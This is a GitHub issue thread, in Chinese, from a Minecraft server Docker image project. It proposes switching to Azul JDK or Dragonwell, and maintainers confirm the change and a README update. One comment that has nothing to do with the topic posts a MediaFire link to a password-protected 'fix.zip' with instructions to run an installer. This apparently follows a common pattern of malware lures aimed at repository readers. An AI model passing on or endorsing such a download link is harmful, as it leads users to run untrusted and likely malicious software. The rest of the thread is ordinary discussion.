### ISSUE TITLE
考虑使用一些性能更好的 JDK

### ISSUE THREAD

**Issue by Water-Buckets** [TYC-Server/TYC-Server-Image#1]
社区的测试(原帖我暂时找不到)表明[Azul JDK](https://www.azul.com/downloads/)和阿里巴巴的[Dragonwell](https://dragonwell-jdk.io/)在运行 Minecraft 服务器时相较于微软的具有更好的性能, 且更节省内存. 若不考虑极端的兼容性, 建议使用以上两个其一(Dragonwell 好像更好点).

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by OptiJava** [comment]
提交了一个，但我没测试，因为docker被墙了我梯子还老崩暂时搞不了（（（

**Comment by Water-Buckets** [comment]
测试好了 README 也更新下.

**Comment by Water-Buckets** [comment]
测试好了 README 也更新下.

**Comment by OptiJava** [comment]
更新了
